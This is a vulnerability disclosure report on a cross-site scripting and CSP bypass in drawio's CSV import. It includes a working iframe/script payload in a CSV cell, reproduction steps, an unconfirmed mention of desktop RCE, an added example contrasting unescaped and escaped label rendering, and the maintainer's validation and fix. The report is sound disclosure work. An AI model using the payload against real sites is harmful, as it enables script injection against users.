Cross-site Scripting and CSP Bypass in jgraph/drawio


Reported on

May 4th 2023


The application allows the user to import a CSV template into the schema, but does not clean the input from the columns, resulting in arbitrary JavaScript code being executed.

Proof of Concept

## Example CSV import. Use ## for comments and # for configuration. Paste CSV below.
## The following names are reserved and should not be used (or ignored):
## id, tooltip, placeholder(s), link and label (see below)
# connect: {"from": "manager", "to": "name", "invert": true, "label": "manages", \
#          "style": "curved=1;endArrow=blockThin;endFill=1;fontSize=11;"}
# connect: {"from": "refs", "to": "id", "style": "curved=1;fontSize=11;"}
# layout: auto
## ---- CSV below this line. First line are column names. ----
Tessa Miller'"><iframe srcdoc='<script src=;-alert(document.domain)-&#x22;></script>'>,CFO,emi,Office 1,,,default,#6c8ebf,,,

Steps to reproduce

Click Insert button -> Advanced -> CSV -> Paste the payload above -> Trigger XSS




XSS; in some cases it is possible to achieve RCE on the desktop app.
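As an added illustration (not drawio's own code, and not the fix shipped in 21.2.8), the snippet below is a minimal importer for the CSV format shown above, with a label renderer that splices the cell straight into markup beside one that escapes it first; parseCsvLine, importCsv and the SAMPLE text are constructed here.

```javascript
// Added example, not drawio's own code: a minimal importer for the CSV
// format shown on this page, with the unsafe label rendering beside an escaped one.
// Split one CSV record into fields, honouring double-quoted fields and "" escapes.
function parseCsvLine(line) {
  const fields = [];
  let cur = '', inQuotes = false;
  for (let i = 0; i < line.length; i++) {
    const ch = line[i];
    if (inQuotes) {
      if (ch === '"' && line[i + 1] === '"') { cur += '"'; i++; }
      else if (ch === '"') inQuotes = false;
      else cur += ch;
    } else if (ch === '"') inQuotes = true;
    else if (ch === ',') { fields.push(cur); cur = ''; }
    else cur += ch;
  }
  fields.push(cur);
  return fields;
}

// "##" comment and "#" configuration lines are skipped; the first remaining line
// names the columns and every later line is one record keyed by those names.
function importCsv(text) {
  const lines = text.split(/\r?\n/).filter(l => l.trim() !== '' && !l.startsWith('#'));
  const header = parseCsvLine(lines[0]);
  return lines.slice(1).map(line => {
    const cells = parseCsvLine(line);
    return Object.fromEntries(header.map((name, i) => [name, cells[i] ?? '']));
  });
}

// Unsafe: the cell value is spliced into markup, so markup inside the cell is live.
function renderLabelUnsafe(name) {
  return `<div class="label">${name}</div>`;
}

// Escape the characters that can close a text node or attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Hardened: the same template, but the cell renders as literal text.
function renderLabelSafe(name) {
  return `<div class="label">${escapeHtml(name)}</div>`;
}

// Constructed sample in the page's layout; the name cell carries a harmless tag and quotes.
const SAMPLE = '## comment\n# layout: auto\nname,position\n"Tessa ""M"" <b>Miller</b>",CFO\n';
```

In a real browser importer the equivalent of renderLabelSafe is assigning the cell to textContent rather than innerHTML; the escaping version is shown so the difference is visible as a string.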

We are processing your report and will contact the jgraph/drawio team within 24 hours. 7 months ago


Public link: PoC

7 months ago



If the public link doesn't trigger XSS after the first time, please refresh the url again.


David Benson
7 months ago


Hi, thanks for the report. The base report is certainly valid. Could you just clarify a few things please:

"in some cases it is possible to rce on the desktop app." That would be a serious issue, but you must provide a PoC.

Looking at the severity, why is the availability marked as low? How does this affect the service availability?

Nhien.IT modified the report
7 months ago



As in previous reports I see that some other researchers can abuse this vulnerability to upgrade to RCE but I haven't found a way to exploit it yet.

As for severity, I'm a bit confused that availability is None. I just updated!

Thank you for this incident!

David Benson validated this vulnerability 7 months ago

Thanks. We haven't managed to recreate the problem in the desktop version to date.

Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
7 months ago


Thanks @maintainer

David Benson marked this as fixed in 21.2.8 with commit c7ac63 7 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Jun 1st 2023
David Benson published this vulnerability 6 months ago